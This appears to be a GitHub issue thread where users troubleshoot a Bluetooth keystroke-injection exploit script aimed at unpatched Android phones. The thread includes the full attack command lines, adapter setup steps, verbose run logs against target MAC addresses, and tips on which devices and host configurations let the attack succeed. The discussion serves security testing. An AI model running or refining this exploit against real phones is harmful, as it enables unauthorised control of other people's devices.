Not working on unpatched devices

[chris-152]

Hi Marc, for me this doesn't work on either of my unpatched android phones. On the phones it will show a passcode, but even when accepting this nothing happens. The scripts tells me that there's an invalid argument (Errno 22). I was wondering if you maybe knew what this means.

[pentestfunctions]

I have been working on a fun implementation of this you can check out and tweak to see if it can help you. https://github.com/pentestfunctions/BlueDucky

Just a side note, are you using the file in the correct folder from the github? If it is showing a passcode it either means it might be 'patched' as in the device is a weird older variety like I have found with NZ vodafone phones (not updated since 2016) or the keyboard.xml file for configuring and setting up is not being read correctly.

Let me know how it goes with my github code as it is.

[chris-152]

Thanks man, will check it out! Could indeed be some patched version, but it was on Android 9. It was a Motorola phone however, so maybe they have some special implementation. I'll look into it some more, thanks for your reply!

[Smankusors]

this is interesting...

I own Android 7, 9, 10, and 11, but this exploit only works on 10 and 11... 🤔

[salamsajid]

I tried performing the same on Xiaomi, Oneplus and Motorola 11,12,13 which has security patch prior 2023 June, so everytime Im running this its triggering the Passkey for Pairing and not able to perform the pairing automatically and keeps on showing error connecting ...... maybe I'm missing something or someone can tell me on which devices it worked for them.

[sfncat]

My test environment is kali Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux bluetooth adapter: Bus 001 Device 030: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode) TEST STEPS: kali: sudo hciconfig hci0 down sudo hciconfig hci0 up sudo ./keystroke-injection-android-linux.py -i hci0 -t f0:5c:77:b9:ad:df

android: settings,open bluetooth,open detected

I tried on android10(pixel4xl) android11(pixel5) android8(honor6x) android6(huawei MateS) In these models, all triggering the Passkey for Pairing, like this ─$ sudo ./keystroke-injection-android-linux.py -i hci0 -t 00:9A:CD:05:19:29 [2024-02-21 10:55:43.961] executing 'sudo service bluetooth restart' [2024-02-21 10:55:44.551] configuring Bluetooth adapter [2024-02-21 10:55:44.553] calling RegisterProfile [2024-02-21 10:55:44.554] running dbus loop [2024-02-21 10:55:44.734] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard' [2024-02-21 10:55:44.744] executing 'hciconfig hci0 name' [2024-02-21 10:55:44.763] executing 'sudo hciconfig hci0 class 0x002540' [2024-02-21 10:55:44.773] executing 'hciconfig hci0 class' [2024-02-21 10:55:44.775] executing 'hcitool name 00:9A:CD:05:19:29' [2024-02-21 10:55:46.054] connecting to SDP [2024-02-21 10:55:46.055] connecting to 00:9A:CD:05:19:29 on port 1 [2024-02-21 10:55:47.881] SUCCESS! connected on port 1 [2024-02-21 10:55:47.881] executing 'sudo btmgmt --index hci0 io-cap 1' [2024-02-21 10:55:47.889] executing 'sudo btmgmt --index hci0 ssp 1' [2024-02-21 10:55:47.898] connected to SDP (L2CAP 1) on target [2024-02-21 10:55:47.902] 'NoInputNoOutput' pairing-agent is running [2024-02-21 10:55:48.149] connecting to 00:9A:CD:05:19:29 on port 19 [2024-02-21 10:55:50.149] ERROR connecting on port 19: timed out [2024-02-21 10:55:50.149] connecting to 00:9A:CD:05:19:29 on port 17 [2024-02-21 10:55:52.151] ERROR connecting on port 17: timed out [2024-02-21 10:55:52.152] connecting to HID Interrupt [2024-02-21 10:55:52.152] connecting to 00:9A:CD:05:19:29 on port 19 [2024-02-21 10:55:54.153] ERROR connecting on port 19: timed out [2024-02-21 10:55:54.153] connecting to HID Interrupt

android4.4.2(nubia) can connected port1,17,19,but failed on send_keyboard_report └─$ sudo ./keystroke-injection-android-linux.py -i hci0 -t 98:6C:F5:96:A0:70 [2024-02-21 10:53:26.691] executing 'sudo service bluetooth restart' [2024-02-21 10:53:27.301] configuring Bluetooth adapter [2024-02-21 10:53:27.302] calling RegisterProfile [2024-02-21 10:53:27.303] running dbus loop [2024-02-21 10:53:27.481] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard' [2024-02-21 10:53:27.491] executing 'hciconfig hci0 name' [2024-02-21 10:53:27.510] executing 'sudo hciconfig hci0 class 0x002540' [2024-02-21 10:53:27.522] executing 'hciconfig hci0 class' [2024-02-21 10:53:27.524] executing 'hcitool name 98:6C:F5:96:A0:70' [2024-02-21 10:53:28.798] connecting to SDP [2024-02-21 10:53:28.798] connecting to 98:6C:F5:96:A0:70 on port 1 [2024-02-21 10:53:29.877] SUCCESS! connected on port 1 [2024-02-21 10:53:29.877] executing 'sudo btmgmt --index hci0 io-cap 1' [2024-02-21 10:53:29.885] executing 'sudo btmgmt --index hci0 ssp 1' [2024-02-21 10:53:29.893] connected to SDP (L2CAP 1) on target [2024-02-21 10:53:29.898] 'NoInputNoOutput' pairing-agent is running [2024-02-21 10:53:30.145] connecting to 98:6C:F5:96:A0:70 on port 19 [2024-02-21 10:53:32.073] ERROR connecting on port 19: [Errno 22] Invalid argument [2024-02-21 10:53:32.073] connecting to 98:6C:F5:96:A0:70 on port 17 [2024-02-21 10:53:32.209] SUCCESS! connected on port 17 [2024-02-21 10:53:32.209] connecting to HID Interrupt [2024-02-21 10:53:32.209] connecting to 98:6C:F5:96:A0:70 on port 19 [2024-02-21 10:53:32.429] SUCCESS! connected on port 19 [2024-02-21 10:53:32.429] connected to HID Interrupt (L2CAP 19) on target [2024-02-21 10:53:32.429] connected to HID Control (L2CAP 17) on target Traceback (most recent call last): File "", line 3, in send _bluetooth.error: (107, 'Transport endpoint is not connected')

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "/home/kali/workspace/github/hi_my_name_is_keyboard/./keystroke-injection-android-linux.py", line 82, in client.send_keyboard_report() File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 119, in send_keyboard_report self.c19.send(keyboard_report(*args)) File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 32, in send raise ex File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 27, in send self.sock.send(data) File "", line 5, in send bluetooth.btcommon.BluetoothError: [Errno 107] Transport endpoint is not connected

[Neowizard]

I tried performing the same on Xiaomi, Oneplus and Motorola 11,12,13 which has security patch prior 2023 June, so everytime Im running this its triggering the Passkey for Pairing and not able to perform the pairing automatically and keeps on showing error connecting ...... maybe I'm missing something or someone can tell me on which devices it worked for them.

I believe it's not enough for just the phone to be unpatched, the attacking machine (e.g. Linux/BlueZ) must also support unauthenticated connections.